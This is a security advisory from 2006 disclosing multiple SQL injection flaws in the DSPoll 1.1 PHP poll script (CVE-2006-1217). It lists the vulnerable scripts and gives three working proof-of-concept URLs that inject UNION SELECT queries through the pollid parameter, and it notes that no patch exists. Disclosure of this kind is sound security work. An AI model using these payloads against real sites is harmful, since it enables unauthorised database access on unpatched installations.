Multiple SQL Injection Vulnerabilities in DSPoll

Summary

Vulnerability
Multiple SQL Injection Vulnerabilities in DSPoll
Discovered
2006.03.12
Last Update
2006.03.23 Exploitation code published
ID
EV0096
CVE
CVE-2006-1217
Risk Level
medium
Type
SQL Injection
Status
Unpatched. No reply from developer(s)
Vendor
n/a
Vulnerable Software
DSPoll (http://dsportal.uw.hu/)
Version
1.1
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in DSPoll (http://dsportal.uw.hu/) script.

Vulnerable scripts:
include/results.php
include/topolls.php
include/pollit.php


Variable $pollid isn't properly sanitized before being used in the SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

PoC/Exploit

SQL Injection Examples:

http://[host]/dspoll/index.php?open=pollresults&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

http://[host]/dspoll/index.php?open=topolls&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

http://[host]/dspoll/index.php?open=pollit&pollid=9999'%20union%20select%201,2/*

Solution.

Solution for "Multiple SQL Injection Vulnerabilities in DSPoll" is not available. Check vendor's website for updates.